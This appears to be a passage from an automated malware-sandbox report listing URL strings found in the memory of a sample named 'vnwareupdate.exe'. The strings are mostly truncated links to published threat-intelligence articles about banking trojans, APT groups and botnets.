Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-CVE-2017-0199:
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-LeetMX
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-North
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-er
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-yberattack
Source: vnwareupdate.exe, 00000003.00000003.238306723.0000000003B67000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/proofpoint-threat-insight-carbana
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/sites/default/files/proofpoint-threat-insight-carbanaCarbanak
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/dyre-malware-campaigners-innovate-distribution-tec
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/dyre-malware-campaigners-innovate-distribution-tecBolek:
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricksExploring
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zer
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerOops
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerTemp.Periscope
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Dyreza-Campaigners-Sights-On-F
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Dyreza-Campaigners-Sights-On-FDyre
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Dyreza-Campaigners-Sights-On-FDyreza
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Dyreza-Campaigners-Sights-On-FOngoing
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Exploit-Kit-Deja-Vu
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Exploit-Kit-Deja-VuTWO
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Exploit-Kit-Deja-VutMassive
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Meet-GreenDispenser
Source: vnwareupdate.exe, 00000003.00000003.241994796.0000000005651000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-Threa
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-ThreaDridex
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/New-Bart-Ransomware-from-ThreaNew
Source: vnwareupdate.exe, 00000003.00000003.235905498.0000000005FB3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/PlugX-in-Russia
Source: vnwareupdate.exe, 00000003.00000003.232809431.0000000005F73000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Troj
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/abbadonpos-now-targeting-speci
Source: vnwareupdate.exe, 00000003.00000003.241572242.0000000005911000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/banking-trojans-dridex-vawtrak
Source: vnwareupdate.exe, 00000003.00000002.546099143.00000000037C7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/banking-trojans-dridex-vawtrakDCSO
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/cryptxxx-ransomware-learns-sam
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/cryptxxx2-ransomware-authors-s
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ranso
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransoDouble
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransoNew
Source: vnwareupdate.exe, 00000003.00000003.241724758.00000000057D1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-reci
Source: vnwareupdate.exe, 00000003.00000002.567684552.0000000004061000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-reciDridex
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/dridex-campaigns-millions-reciUrsnif
Source: vnwareupdate.exe, 00000003.00000003.242436168.0000000003BA7000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backd
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdDroidJack
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/droidjack-uses-side-load-backdOPERATION
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleARP
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleFin7
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscri
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappearHancitor
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappearOdinaff:
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/kovter-group-malvertising-camp
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/kovter-group-malvertising-campThe
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spea
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spea013
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spea8Leviathan:
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-speaLeviathan:
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-speaNew
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-speacLeviathan:
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-speameLeviathan:
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-speaoLeviathan:
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.522468680.00000000022F1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/massive-adgholas-malvertising-
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/massive-adgholas-malvertising-CVE-2017-0199
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/massive-adgholas-malvertising-Massive
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/massive-adgholas-malvertising-Temp.Periscope
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/necurs-botnet-returns-with-upd
Source: vnwareupdate.exe, 00000003.00000003.242214739.0000000005451000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russia
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russiaNetTraveler
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russiaSednit
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-aptCampaign
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-aptOperation
Source: vnwareupdate.exe, 00000003.00000003.242072217.0000000005511000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/ostap-bender-400-ways-make-pop
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/ostap-bender-400-ways-make-popAided
Source: vnwareupdate.exe, 00000003.00000002.566831546.0000000004021000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/ostap-bender-400-ways-make-popKOVTER
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/ostap-bender-400-ways-make-popOstap
Source: vnwareupdate.exe, 00000008.00000003.285342005.0000000005DF3000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/panda-banker-new-banking-troja
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/phish-scales-malicious-actor-tAndroid
Source: vnwareupdate.exe, 00000003.00000002.565870570.0000000003FE1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/phish-scales-malicious-actor-tFlying
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-//Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-/LSmominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-02Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-33Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-82Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-a3Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-beSmominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-c7Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-f37Smominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-fbSmominru
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-koOilRig
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/spam-now-with-side-of-cryptxxx
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/spam-now-with-side-of-cryptxxxSpam
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/spam-now-with-side-of-cryptxxxTARGETED
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopi
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopi1#ISMDoor
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiNRecent
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopib8Turla
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopieTurla
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/ursnif-banking-trojan-campaign
Source: vnwareupdate.exe, 00000003.00000002.570079073.0000000004121000.00000004.00000001.sdmp	String found in binary or memory: https://www.proofpoint.com/us/threat-insight/post/ursnif-banking-trojan-campaignUrsnif
Source: vnwareupdate.exe, 00000003.00000002.539674279.0000000003681000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clou
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clou617ba23c7a6aad88;APT
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clouCOSMICDUKE
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clouIlluminating
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clouNew
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clouTARGETED
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clouThreat
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-clouUpdated
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.recordedfuture.com/web-shell-analysis-part-2/
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.reuters.com/article/us-india-cyber-threat-idUSKCN1B80Y2
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.reuters.com/article/us-india-cyber-threat-idUSKCN1B80Y2India
Source: vnwareupdate.exe, 00000003.00000003.234630712.00000000061B3000.00000004.00000001.sdmp	String found in binary or memory: https://www.reuters.com/article/us-india-cyber-threat-idUSKCN1B80Y2Vacation
Source: vnwareupdate.exe, 00000003.00000003.233888921.0000000005C33000.00000004.00000001.sdmp	String found in binary or memory: https://www.reverse.it/sample/6995fd3a66382669a48e071033a08c9404efd30c065b54f1ab
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?envir
Source: vnwareupdate.exe, 00000003.00000003.245741695.0000000003A67000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-coba
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-coba0Cobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-coba5Cobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-coba6Cobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-coba8Cobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaCCobalt
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaInfrastructure
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaTCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaTDaserf
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaUCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaaCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobadCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobaeCobalt
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobafcCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobagCobalt
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobanCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobapCobalt
Source: vnwareupdate.exe, 00000003.00000003.237183356.0000000002BCE000.00000004.00000001.sdmp	String found in binary or memory: https://www.reversinglabs.com/newsroom/news/reversinglabs-yara-rule-detects-cobarCobalt
Source: vnwareupdate.exe, 00000003.00000003.241827224.0000000005711000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskanalytics.com/blog/post.php?s=2017-07-07-coming-to-a-break-room-
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskanalytics.com/blog/post.php?s=2017-07-07-coming-to-a-break-room-EITest
Source: vnwareupdate.exe, 00000003.00000003.234528386.0000000006133000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskanalytics.com/blog/post.php?s=2017-07-07-coming-to-a-break-room-WannaCry
Source: vnwareupdate.exe, 00000003.00000003.245916145.0000000003967000.00000004.00000001.sdmp, vnwareupdate.exe, 00000003.00000003.237713875.0000000003967000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/
Source: vnwareupdate.exe, 00000003.00000003.245791168.00000000039A7000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/cobalt-strike/
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/cobalt-strike/CCobalt
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/cobalt-strike/FileTour
Source: vnwareupdate.exe, 00000003.00000003.245318104.0000000003B27000.00000004.00000001.sdmp	String found in binary or memory: https://www.riskiq.com/blog/labs/fake-flash-update-watering-hole-attack/
